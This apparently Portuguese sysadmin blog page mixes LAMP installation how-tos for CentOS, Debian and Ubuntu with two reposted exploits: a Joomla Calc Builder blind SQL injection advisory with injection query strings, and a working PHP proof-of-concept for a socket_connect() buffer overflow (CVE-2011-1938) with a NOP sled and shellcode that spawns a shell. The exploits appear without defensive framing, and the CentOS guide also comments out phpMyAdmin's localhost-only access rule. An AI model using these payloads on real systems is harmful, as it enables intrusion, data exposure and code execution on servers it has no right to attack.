Centos 5.6 Apache 2 php 5 Mysql 5 em passos simples :P

Standard

O caboclo que disser que o CentOs não é um ambiente bombado para Apache 2, Mysql 5, PHP 5 e PHPMYADMIN  é um belo mentiroso!

Estamos abaixo fazendo um How to em poucos passos usando o Yum afim de deixar muito rapidamente seu lamp2 rodando filé.

Faça todos os passos como root, please.

Primeiro vamos instalar o mysql 5:

yum install mysql mysql-server -y

O comando acima instala o mysql client e server.

Vamos  dar permissão para que o mysql execute o serviço no boot e em seguida iniciar o bichão:

chkconfig –levels 235 mysqld on

/etc/init.d/mysqld start

Agora vamos corrigir as tranqueiras de senhas:

mysql_secure_installation

A saída desse comando será semelhante a de baixo (sem contar que você terá de interagir com algumas requisições):

NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL
SERVERS IN PRODUCTION USE!  PLEASE READ EACH STEP CAREFULLY!

In order to log into MySQL to secure it, we’ll need the current
password for the root user.  If you’ve just installed MySQL, and
you haven’t set the root password yet, the password will be blank,
so you should just press enter here.

Enter current password for root (enter for none):
OK, successfully used password, moving on…

Setting the root password ensures that nobody can log into the MySQL
root user without the proper authorisation.

Set root password? [Y/n] <– APERTE ENTER
New password: <– DIGITE A SENHA DE ROOT DO MYSQL
Re-enter new password: <– REPITA A SENHA DE ROOT DO MYSQL
Password updated successfully!
Reloading privilege tables..
… Success!

By default, a MySQL installation has an anonymous user, allowing anyone
to log into MySQL without having to have a user account created for
them.  This is intended only for testing, and to make the installation
go a bit smoother.  You should remove them before moving into a
production environment.

Remove anonymous users? [Y/n] <– ENTER PARA CONFIRMAR
… Success!

Normally, root should only be allowed to connect from ‘localhost’.  This
ensures that someone cannot guess at the root password from the network.

Disallow root login remotely? [Y/n] <– ENTER PARA CONFIRMAR
… Success!

By default, MySQL comes with a database named ‘test’ that anyone can
access.  This is also intended only for testing, and should be removed
before moving into a production environment.

Remove test database and access to it? [Y/n] <– ENTER PARA CONFIRMAR
– Dropping test database…
… Success!
– Removing privileges on test database…
… Success!

Reloading the privilege tables will ensure that all changes made so far
will take effect immediately.

Reload privilege tables now? [Y/n] <– ENTER PARA CONFIRMAR
… Success!

Cleaning up…

All done!  If you’ve completed all of the above steps, your MySQL
installation should now be secure.

Thanks for using MySQL!

 

—-

 

Agora que nosso mysql está mais seguro que o default e instalado temos de instalar oo apache 2:

yum install httpd -y

Teremos de atribuir as permissões para que o Apache 2 inicie juntamente com o server:

chkconfig –levels 235 httpd on

Vamos iniciar o bichão:

/etc/init.d/httpd start

Presumindo que você setou um ip ou que no ifconfig seu ip seja 10.0.0.1, se quiser conferir que ficou filé o apache acesse assim (no navegador):

http://10.0.0.1

Normalmente Rhel-Based atribuem o root site aqui: /var/www/html

Chega de demoras e vamos meter bala no PHP:

yum install php

Vamos garantir que os novos confs vão rodar?

/etc/init.d/httpd restart

Como testar se o apache está interpretando php:

vim /var/www/html/testes.php

Dentro do arquivo coloque:

<?php phpinfo(); ?>

Em seguida abra o navegador e tente acessar assim: http://10.0.0.1/testes.php

Vamos integrar mais coisas ao php assim como o mysql sendo suportado pelo mesmo?

yum install php-mysql php-gd php-imap php-ldap php-odbc php-pear php-xml php-xmlrpc -y

 

E o phpmyadmin? Rola ou não rola?

Se o seu S.O. for 64 bits rode assim:

wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.2-2.el5.rf.x86_64.rpm
rpm -Uhv rpmforge-release-0.5.2-2.el5.rf.x86_64.rpm

Se o seu S.O. for 32 bits rode assim:

wget http://packages.sw.be/rpmforge-release/rpmforge-release-0.5.2-2.el5.rf.i386.rpm
rpm -Uhv rpmforge-release-0.5.2-2.el5.rf.i386.rpm

Depois disso meta bala na instalação do phpmyadmin:

yum install phpmyadmin -y

Depois vamos deixar as coisas no devido lugar. Teremos de fazer um alias para que o phpmyadmin rode corretamente:

vim /etc/httpd/conf.d/phpmyadmin.conf

#
#  Web application to manage MySQL
#

#<Directory "/usr/share/phpmyadmin">
#  Order Deny,Allow
#  Deny from all
#  Allow from 127.0.0.1
#</Directory>

Alias /phpmyadmin /usr/share/phpmyadmin
Alias /phpMyAdmin /usr/share/phpmyadmin
Alias /mysqladmin /usr/share/phpmyadmin

 

Vamos editar o modo de autenticação do phpmyadmin de cookie para http:

vim /usr/share/phpmyadmin/config.inc.php

[...conteúdo anterior]
/* Authentication type */
$cfg['Servers'][$i]['auth_type'] = 'http';
[...conteúdo posterior]

 

Depois disso temos que reiniciar o apache para garantir que o phpmyadmin rode filé:

/etc/init.d/httpd restart

 

Vamos nos certificar do crime???

http://10.0.0.1/phpmyadmin

Se rodar sem problemas, parabéns, você seguiu fielmente este how to.

 

 

Nossas fontes:

 

Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability

Standard

———————————————————————————
Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability
———————————————————————————

Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[alt+64]gmail.com
Date : 19 June 2011
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
—————————————————————————

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Calc Builder
version : 0.0.1
Developer : Guillermo Santiago
License : GPLv2 or later type : Commercial
Date Added : 12 June 2011
Price : 9.90 €
Demo : http://components.moonsoft.es/democalcbuilder
Download : http://components.moonsoft.es/downloadcalcbuilder

Description :

CALC BUILDER allows you to create dynamic calculators.
Define your own input user form (types, size, order,validations).
Build results table through PHP code.
Export result table to PDF.
Simple and easy configuration. Three examples included.

—————————————————————————

I.Blind SQL injection (id) Poc/Exploit:
~~~~~~~~~
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 [blind]&fld_5=C

example
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=1&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=2&fld_5=C

…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=4&fld_5=C
…..option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=5&fld_5=C

A special greeting to my good friends:
R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita 🙂

+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

Standard

<?php

// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...n";
define('EVIL_SPACE_ADDR', "xffxffxeexb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0".
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)n";
$var85 = socket_connect($var79,$b);

?>

 

fonte: http://www.exploit-db.com/exploits/17318

Como instalar o apache 2 mysql 5 php 5 e phpmyadmin no Debian 5.0.6

Standard

PessoALL, estamos fazendo outro How to da série Lamp2. O ambiente apache (container web ou servidor de páginas mais utilizado da internet), php 5 (linguagem de programação mais utilizada da internet), mysql 5 (banco de dados mais usado na internet) e phpmyadmin (gestor de bases de dados mysql mais amigável em termos de front-end) é indispensável para desenvolvedores php. Abaixo, em passos e imagens simples você saberá como instalar e deixar 100% operacional a famosa arquitetura LAMP2.

Primeiro passo é ter poder de root (no caso de nossa instalação). Iremos abrir o console como root afim de evitar que utilizemos o comando sudo antes dos comandos gerais de instalação do lamp2. Na realidade NADA impede que você possa instalar o lamp2 com comandos em um terminal comum, a única coisa que ressaltamos é que tome cuidado sempre com a precedência do comando sudo na frente de nossos comandos abaixo citados, ou logar-se como root com su –  para atrair um ambiente root globalmente. No mais tudo será muito semelhante.

O Hardware testado é simples, celeron i386 (debian 32 bits em cima de um celeron), 512 de ram e disco de 10gb.
A versão usada é o Debian 5.0.6.

1 – Clique em Aplicações -> Acessórios -> Terminal Como Root. A imagem abaixo demonstra claramente como este passo-a-passo é feito:

terminal root

terminal root

Antes de mais nada certifique-se que tudo está ok com o apt-get, por isso use:

apt-get update

A saída é muito parecida com a imagem abaixo:

Apt get

Certificar o Apt

Assim que o terminal estiver operando (aberto) vamos instalar o apache2 com o seguinte comando:

apt-get install apache2

Assim que este comando for digitado, a saída exige que se Aperte S para confirmar ou N para cancelar a instalação. A imagem é muito parecida com a saída abaixo:

confirmar apache2

confirmar apache2

A saída após confirmar com S é muito parecida com:

saida apache2

saida apache2

Neste ponto o apache 2 está online.
Agora vamos instalar o php5 no apache 2 como DSO (php como módulo do apache2).
Para isto digite o comando:

apt-get install php5 libapache2-mod-php5

A saída para este comando é muito parecida com a imagem abaixo:

apache php mod

apache php mod

Pronto, para confirmar que o php 5 está sendo interpretado no apache2, primeiro é necessário digitar o comando abaixo afim de que o apache 2 possa reler suas configurações de maneira simples e rápida:

/etc/init.d/apache2 restart

Esse comando reinicia o apache2. Feito isto, podemos remover o index.html e criar um arquivo php. Para isto faça:

rm -rf /var/www/index.html

Este comando remove o arquivo index.html default do apache2. Abaixo vamos criar um arquivo index.php:

vim /var/www/index.php

Dentro do arquivo coloque o conteúdo da imagem abaixo:

index php

index php

A saída disto pode ser testada em um navegador através do endereço:

http://localhost/index.php

A saída deste acesso deve ser indêntica a imagem abaixo:

localhost

localhost

Agora precisams instalar o mysql 5 em nosso Debian, para isto use o seguinte comando:

apt-get install mysql-server

Será necessário confirmar, conforme a imagem abaixo:

instalar MYSQL

instalar MYSQL

Confirme com S, assim que ocorrer o processo de instalação do mysql server a saída será muito parecida com a imagem abaixo:

confirmar senha MYSQL

confirmar senha MYSQL

Esse trecho o mysql vai pedir a senha de root que será a senha padrão do administrador do mysql 5. Confirme com qualquer senha definida ao seu critério, em seguida uma nova tela será exibida pedindo confirmação de senha novamente, conforme a tela abaixo:

Repetir Senha MYSQL

Repetir Senha MYSQL

As mensagens exibidas na instalação do mysql após confirmado devem ser muito parecidas com as da tela abaixo:

Resultado Mysql

Resultado Mysql

Agora iremos para o passo final, a integração entre o apache, php, mysql e phpmyadmin. Para isto precisamos instalar a integração com o seguinte comando:

apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

Assim que o comando é digitado, conforme citamos acima, você precisa apertar S para que seja confirmada a instalação da integração de o phpmyadmin. A saída do comando acima é muito parecida com a imagem a seguir:

lamp Integracao

Confirmando com S a instalação prosseguirá, porém o phpmyadmin solicitará o container o qual ele vai operar. Devemos escolher o Apache2 conforme nosso padrão de instalação. Printamos a tela com esta informação:

Marque Apache

Marque Apache

Após marcação, a saída final segue-se abaixo:

Saida Integracao

Saida Integracao

Pronto, agora só precisamos reiniciar o apache2 para que toda integração ocorra fielmente, precisamos copiar a pasta do phpmyadmin para o /var/www afim de acessarmos com c o front-end do phpmyadmin.
Para isto digite os comandos:

/etc/init.d/apache2 restart

cp -rp /usr/share/phpmyadmin /var/www

O segundo comando faz a cópia citada.

Para testarmos TUDO basta abrirmos o navegador e inserirmos o endereço http://localhost/phpmyadmin, se a saída for idêntica a da imagem abaixo, parabéns, sua missão acaba agora!

Teste php myadmin FINAL

Teste php myadmin FINAL

Se quiser acessar o phpmyadmin basta colocar root como usuário e informar a senha de root definida no momento da instalação do mysql.

Agradecemos pelo seu empenho junto conosco neste how to 😛

Att: littleoak

Apache 2 Mysql 5 PHP 5 e phpmyadmin no Ubuntu 10.04 Lucid Lynx

Standard

Hoje, para a gama de desenvolvedores PHP que o mercado tem é indispensável que se tenha um ambiente lamp (linux + apache + php + mysql e como adicional o phpmyadmin, ferramenta indispensável para gerenciar bancos de dados mysql sem qualquer dificuldade) operando pelo menos em um notebook de alguém. Este How to, anteriormente postado em meu antigo blog foi testado (antes de ser postado) em um ambiente com:

Processador Celeron 900 (2.2 ghz),
2 gb de ram ddr 667,
hd 160 gb com 5400 rpm,
Ubuntu 10.04 (Lucid Lynx).
Ressalto que usei o gestor de pacotes e habilitei o suporte a pacotes instáveis e também o repositório partner (mais abaixo posto como fazer).
Por isto talvez as versões dos programas instalados a seguir podem variar em poucos pontos, por exemplo: PHP 5.2.13 e seria instalado, caso não atualizasse os pacotes para instáveis ficaria em 5.2.9.

Os passos a seguir são simples e não demandam muito conhecimento em Linux, bastando somente que ejam seguidos a risca para que nenhum ponto seja esquecido.
Vamos lá:

Clique em Aplicativos->Acessórios->Terminal

Digite o Comando:

sudo apt-get install apache2

A saída deste comando, assim que confirmado com a opção S (yes em inglês seria Y) assemelha-se com:

Lendo listas de pacotes… Pronto
Construindo árvore de dependências
Lendo informação de estado… Pronto
Os pacotes extra a seguir serão instalados:
apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap
Pacotes sugeridos:
apache2-doc apache2-suexec apache2-suexec-custom
Os NOVOS pacotes a seguir serão instalados:
apache2 apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap
0 pacotes atualizados, 9 pacotes novos instalados, 0 a serem removidos e 0 não atualizados.
É preciso baixar 3328kB de arquivos.
Depois desta operação, 10,1MB adicionais de espaço em disco serão usados.
Você quer continuar [S/n]? S
0% [Aguardando por cabeçalhos]
Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main libapr1 1.3.8-1build1 [116kB]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid/main libaprutil1 1.3.9+dfsg-3build1 [85,4kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid/main libaprutil1-dbd-sqlite3 1.3.9+dfsg-3build1 [27,1kB]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid/main libaprutil1-ldap 1.3.9+dfsg-3build1 [25,1kB]
Obter:5 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2.2-bin 2.2.14-5ubuntu8 [2622kB]
Obter:6 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2-utils 2.2.14-5ubuntu8 [159kB]
Obter:7 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2.2-common 2.2.14-5ubuntu8 [290kB]
Obter:8 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2-mpm-worker 2.2.14-5ubuntu8 [2364B]
Obter:9 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2 2.2.14-5ubuntu8 [1482B]
Baixados 3328kB em 40s (81,4kB/s)
Selecionando pacote previamente não selecionado libapr1.
(Lendo banco de dados … 148327 arquivos e diretórios atualmente instalados).
Desempacotando libapr1 (de …/libapr1_1.3.8-1build1_i386.deb) …
Selecionando pacote previamente não selecionado libaprutil1.
Desempacotando libaprutil1 (de …/libaprutil1_1.3.9+dfsg-3build1_i386.deb) …
Selecionando pacote previamente não selecionado libaprutil1-dbd-sqlite3.
Desempacotando libaprutil1-dbd-sqlite3 (de …/libaprutil1-dbd-sqlite3_1.3.9+dfsg-3build1_i386.deb) …
Selecionando pacote previamente não selecionado libaprutil1-ldap.
Desempacotando libaprutil1-ldap (de …/libaprutil1-ldap_1.3.9+dfsg-3build1_i386.deb) …
Selecionando pacote previamente não selecionado apache2.2-bin.
Desempacotando apache2.2-bin (de …/apache2.2-bin_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2-utils.
Desempacotando apache2-utils (de …/apache2-utils_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2.2-common.
Desempacotando apache2.2-common (de …/apache2.2-common_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2-mpm-worker.
Desempacotando apache2-mpm-worker (de …/apache2-mpm-worker_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado apache2.
Desempacotando apache2 (de …/apache2_2.2.14-5ubuntu8_i386.deb) …
Processando gatilhos para man-db …
Processando gatilhos para ufw …
Processando gatilhos para ureadahead …
ureadahead will be reprofiled on next reboot
Configurando libapr1 (1.3.8-1build1) …

Configurando libaprutil1 (1.3.9+dfsg-3build1) …

Configurando libaprutil1-dbd-sqlite3 (1.3.9+dfsg-3build1) …
Configurando libaprutil1-ldap (1.3.9+dfsg-3build1) …
Configurando apache2.2-bin (2.2.14-5ubuntu8) …
Configurando apache2-utils (2.2.14-5ubuntu8) …
Configurando apache2.2-common (2.2.14-5ubuntu8) …
Enabling site default.
Enabling module alias.
Enabling module autoindex.
Enabling module dir.
Enabling module env.
Enabling module mime.
Enabling module negotiation.
Enabling module setenvif.
Enabling module status.
Enabling module auth_basic.
Enabling module deflate.
Enabling module authz_default.
Enabling module authz_user.
Enabling module authz_groupfile.
Enabling module authn_file.
Enabling module authz_host.
Enabling module reqtimeout.

Configurando apache2-mpm-worker (2.2.14-5ubuntu8) …
* Starting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Configurando apache2 (2.2.14-5ubuntu8) …

Processando gatilhos para libc-bin …
ldconfig deferred processing now taking place

Assim que esta etapa terminar teremos o apache rodando, mas precisamos prosseguir, digite:

sudo apt-get install php5 libapache2-mod-php5

Esta etapa instala o php5 com integração em modo DSO junto ao apache (como módulo do apache 2). Sempre confirme que quer instalar apertando S (caso solicite em inglês, Y). A saída do comando acima assemelha-se e muito com a saída informada logo abaixo:

Lendo listas de pacotes… Pronto
Construindo árvore de dependências
Lendo informação de estado… Pronto
Os pacotes extra a seguir serão instalados:
apache2-mpm-prefork php5-common
Pacotes sugeridos:
php-pear php5-suhosin
Os pacotes a seguir serão REMOVIDOS:
apache2-mpm-worker
Os NOVOS pacotes a seguir serão instalados:
apache2-mpm-prefork libapache2-mod-php5 php5 php5-common
0 pacotes atualizados, 4 pacotes novos instalados, 1 a serem removidos e 0 não atualizados.
É preciso baixar 3376kB de arquivos.
Depois desta operação, 8790kB adicionais de espaço em disco serão usados.
Você quer continuar [S/n]? S
Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main apache2-mpm-prefork 2.2.14-5ubuntu8 [2422B]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5-common 5.3.2-1ubuntu4.1 [541kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main libapache2-mod-php5 5.3.2-1ubuntu4.1 [2831kB]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5 5.3.2-1ubuntu4.1 [1114B]
Baixados 3376kB em 8s (389kB/s)
dpkg: apache2-mpm-worker: problemas de dependência, mas removendo assim mesmo conforme pedido:
apache2 depende de apache2-mpm-worker (= 2.2.14-5ubuntu8) | apache2-mpm-prefork (= 2.2.14-5ubuntu8) | apache2-mpm-event (= 2.2.14-5ubuntu8) | apache2-mpm-itk (= 2.2.14-5ubuntu8); porém:
Pacote apache2-mpm-worker está para ser removido.
Pacote apache2-mpm-prefork não está instalado.
Pacote apache2-mpm-event não está instalado.
Pacote apache2-mpm-itk não está instalado.
(Lendo banco de dados … 148902 arquivos e diretórios atualmente instalados).
Removendo apache2-mpm-worker …
* Stopping web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
… waiting [ OK ]
Selecionando pacote previamente não selecionado apache2-mpm-prefork.
(Lendo banco de dados … 148895 arquivos e diretórios atualmente instalados).
Desempacotando apache2-mpm-prefork (de …/apache2-mpm-prefork_2.2.14-5ubuntu8_i386.deb) …
Selecionando pacote previamente não selecionado php5-common.
Desempacotando php5-common (de …/php5-common_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado libapache2-mod-php5.
Desempacotando libapache2-mod-php5 (de …/libapache2-mod-php5_5.3.2-1ubuntu4.1_i386.deb) …
Selecionando pacote previamente não selecionado php5.
Desempacotando php5 (de …/php5_5.3.2-1ubuntu4.1_all.deb) …
Configurando apache2-mpm-prefork (2.2.14-5ubuntu8) …
* Starting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Configurando php5-common (5.3.2-1ubuntu4.1) …
Configurando libapache2-mod-php5 (5.3.2-1ubuntu4.1) …

Creating config file /etc/php5/apache2/php.ini with new version
* Reloading web server config apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Configurando php5 (5.3.2-1ubuntu4.1) …

Apesar de já termos instalado o apache 2 + php 5 é necessário reiniciar o apache 2 afim de que o serviço possa reler suas configurações e assim possamos ter uma reposta da instalação a qual realizamos. Para isto use o comando:

sudo /etc/init.d/apache2 restart

A mensagem exibida por este comando é muito semelhante a mensagem a seguir:

* Restarting web server apache2 apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
… waiting apache2: Could not reliably determine the server’s fully qualified domain name, using 127.0.1.1 for ServerName
[ OK ]

Não precisa confirmar  nada junto ao /var/www pois o php DEVE estar operando junto com o apache 2.

Agora vamos prosseguir com o mysql 5. Para instalar o mesmo digite:

sudo apt-get install mysql-server

Confirme com S (ou Y caso seja americano), a saída deve ser semelhante com:

Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-common 5.1.41-3ubuntu12 [97,1kB]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid/main libnet-daemon-perl 0.43-1 [46,9kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid/main libplrpc-perl 0.2020-2 [36,0kB]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid/main libdbi-perl 1.609-1build1 [798kB]
Obter:5 http://br.archive.ubuntu.com/ubuntu/ lucid/main libmysqlclient16 5.1.41-3ubuntu12 [1931kB]
Obter:6 http://br.archive.ubuntu.com/ubuntu/ lucid/main libdbd-mysql-perl 4.012-1ubuntu1 [135kB]
Obter:7 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-client-core-5.1 5.1.41-3ubuntu12 [176kB]
Obter:8 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-client-5.1 5.1.41-3ubuntu12 [8136kB]
Obter:9 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-server-core-5.1 5.1.41-3ubuntu12 [4711kB]
Obter:10 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-server-5.1 5.1.41-3ubuntu12 [7007kB]
Obter:11 http://br.archive.ubuntu.com/ubuntu/ lucid/main libhtml-template-perl 2.9-1 [65,8kB]
Obter:12 http://br.archive.ubuntu.com/ubuntu/ lucid/main mysql-server 5.1.41-3ubuntu12 [93,0kB]
Baixados 23,2MB em 1min 58s (196kB/s)
Pré-configurando pacotes …
Selecionando pacote previamente não selecionado mysql-common.
(Lendo banco de dados … 150463 arquivos e diretórios atualmente instalados).
Desempacotando mysql-common (de …/mysql-common_5.1.41-3ubuntu12_all.deb) …
Selecionando pacote previamente não selecionado libnet-daemon-perl.
Desempacotando libnet-daemon-perl (de …/libnet-daemon-perl_0.43-1_all.deb) …
Selecionando pacote previamente não selecionado libplrpc-perl.
Desempacotando libplrpc-perl (de …/libplrpc-perl_0.2020-2_all.deb) …
Selecionando pacote previamente não selecionado libdbi-perl.
Desempacotando libdbi-perl (de …/libdbi-perl_1.609-1build1_i386.deb) …
Selecionando pacote previamente não selecionado libmysqlclient16.
Desempacotando libmysqlclient16 (de …/libmysqlclient16_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado libdbd-mysql-perl.
Desempacotando libdbd-mysql-perl (de …/libdbd-mysql-perl_4.012-1ubuntu1_i386.deb) …
Selecionando pacote previamente não selecionado mysql-client-core-5.1.
Desempacotando mysql-client-core-5.1 (de …/mysql-client-core-5.1_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado mysql-client-5.1.
Desempacotando mysql-client-5.1 (de …/mysql-client-5.1_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado mysql-server-core-5.1.
Desempacotando mysql-server-core-5.1 (de …/mysql-server-core-5.1_5.1.41-3ubuntu12_i386.deb) …
Processando gatilhos para man-db …
Configurando mysql-common (5.1.41-3ubuntu12) …
Selecionando pacote previamente não selecionado mysql-server-5.1.
(Lendo banco de dados … 150828 arquivos e diretórios atualmente instalados).
Desempacotando mysql-server-5.1 (de …/mysql-server-5.1_5.1.41-3ubuntu12_i386.deb) …
Selecionando pacote previamente não selecionado libhtml-template-perl.
Desempacotando libhtml-template-perl (de …/libhtml-template-perl_2.9-1_all.deb) …
Selecionando pacote previamente não selecionado mysql-server.
Desempacotando mysql-server (de …/mysql-server_5.1.41-3ubuntu12_all.deb) …
Processando gatilhos para ureadahead …
Processando gatilhos para man-db …
Configurando libnet-daemon-perl (0.43-1) …
Configurando libplrpc-perl (0.2020-2) …
Configurando libdbi-perl (1.609-1build1) …
Configurando libmysqlclient16 (5.1.41-3ubuntu12) …

Configurando libdbd-mysql-perl (4.012-1ubuntu1) …
Configurando mysql-client-core-5.1 (5.1.41-3ubuntu12) …
Configurando mysql-client-5.1 (5.1.41-3ubuntu12) …
Configurando mysql-server-core-5.1 (5.1.41-3ubuntu12) …
Configurando mysql-server-5.1 (5.1.41-3ubuntu12) …
mysql start/running, process 4808

Configurando libhtml-template-perl (2.9-1) …
Configurando mysql-server (5.1.41-3ubuntu12) …
Processando gatilhos para libc-bin …
ldconfig deferred processing now taking place

Os passos a seguir mostram o mysql solicitando dados extras. Iremos colocar imagens dos passos a seguir:
imagens 1 e 2 -> MYSQL solicitando a senha de root, digite-a e em seguida repita a mesma. Escolha uma senha ao seu critério. Caso seja um ambiente de produção real recomendamos que use caracteres $#%@!& para sua senha afim de que em um caso de vulnerabilidade por brute force o atacante perdure por muitos dias (ou meses) na tentativa de quebrar a senha.


imagem de requisição de repetição da senha de root:

Estamos muito próximos da etapa final. Os passos a seguir mostram como integrar o php 5 + apache 2 + mysql 5 para que operem de maneira correta, assim como adicionar o phpmyadmin a esta instalação:

sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

Confirme com S (caso seja americano confirme com Y). A saída para este comando deve ser semelhante a:

Lendo listas de pacotes… Pronto
Construindo árvore de dependências
Lendo informação de estado… Pronto
Os pacotes extra a seguir serão instalados:
dbconfig-common javascript-common libjs-mootools libmcrypt4 libt1-5 php5-gd php5-mcrypt wwwconfig-common
Pacotes sugeridos:
libmcrypt-dev mcrypt postgresql-client apache apache-ssl
Os NOVOS pacotes a seguir serão instalados:
dbconfig-common javascript-common libapache2-mod-auth-mysql libjs-mootools libmcrypt4 libt1-5 php5-gd php5-mcrypt php5-mysql phpmyadmin wwwconfig-common
0 pacotes atualizados, 11 pacotes novos instalados, 0 a serem removidos e 0 não atualizados.
É preciso baixar 5404kB de arquivos.
Depois desta operação, 21,9MB adicionais de espaço em disco serão usados.
Você quer continuar [S/n]? S
Obter:1 http://br.archive.ubuntu.com/ubuntu/ lucid/main dbconfig-common 1.8.44ubuntu1 [474kB]
Obter:2 http://br.archive.ubuntu.com/ubuntu/ lucid/universe wwwconfig-common 0.2.1 [22,8kB]
Obter:3 http://br.archive.ubuntu.com/ubuntu/ lucid/universe javascript-common 7 [3854B]
Obter:4 http://br.archive.ubuntu.com/ubuntu/ lucid/main libapache2-mod-auth-mysql 4.3.9-12ubuntu1 [25,6kB]
Obter:5 http://br.archive.ubuntu.com/ubuntu/ lucid/universe libjs-mootools 1.2.4.0~debian1-1 [248kB]
Obter:6 http://br.archive.ubuntu.com/ubuntu/ lucid/universe libmcrypt4 2.5.8-3.1 [76,1kB]
Obter:7 http://br.archive.ubuntu.com/ubuntu/ lucid/main libt1-5 5.1.2-3build1 [155kB]
Obter:8 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5-gd 5.3.2-1ubuntu4.1 [34,8kB]
Obter:9 http://br.archive.ubuntu.com/ubuntu/ lucid/universe php5-mcrypt 5.3.2-0ubuntu1 [15,2kB]
Obter:10 http://br.archive.ubuntu.com/ubuntu/ lucid-proposed/main php5-mysql 5.3.2-1ubuntu4.1 [64,2kB]
Obter:11 http://br.archive.ubuntu.com/ubuntu/ lucid/universe phpmyadmin 4:3.3.2-1 [4285kB]
Baixados 5404kB em 45s (118kB/s)
Pré-configurando pacotes …
Selecionando pacote previamente não selecionado dbconfig-common.
(Lendo banco de dados … 150920 arquivos e diretórios atualmente instalados).
Desempacotando dbconfig-common (de …/dbconfig-common_1.8.44ubuntu1_all.deb) …
Selecionando pacote previamente não selecionado wwwconfig-common.
Desempacotando wwwconfig-common (de …/wwwconfig-common_0.2.1_all.deb) …
Selecionando pacote previamente não selecionado javascript-common.
Desempacotando javascript-common (de …/javascript-common_7_all.deb) …
Selecionando pacote previamente não selecionado libapache2-mod-auth-mysql.
Desempacotando libapache2-mod-auth-mysql (de …/libapache2-mod-auth-mysql_4.3.9-12ubuntu1_i386.deb) …
Selecionando pacote previamente não selecionado libjs-mootools.
Desempacotando libjs-mootools (de …/libjs-mootools_1.2.4.0~debian1-1_all.deb) …
Selecionando pacote previamente não selecionado libmcrypt4.
Desempacotando libmcrypt4 (de …/libmcrypt4_2.5.8-3.1_i386.deb) …
Selecionando pacote previamente não selecionado libt1-5.
Desempacotando libt1-5 (de …/libt1-5_5.1.2-3build1_i386.deb) …
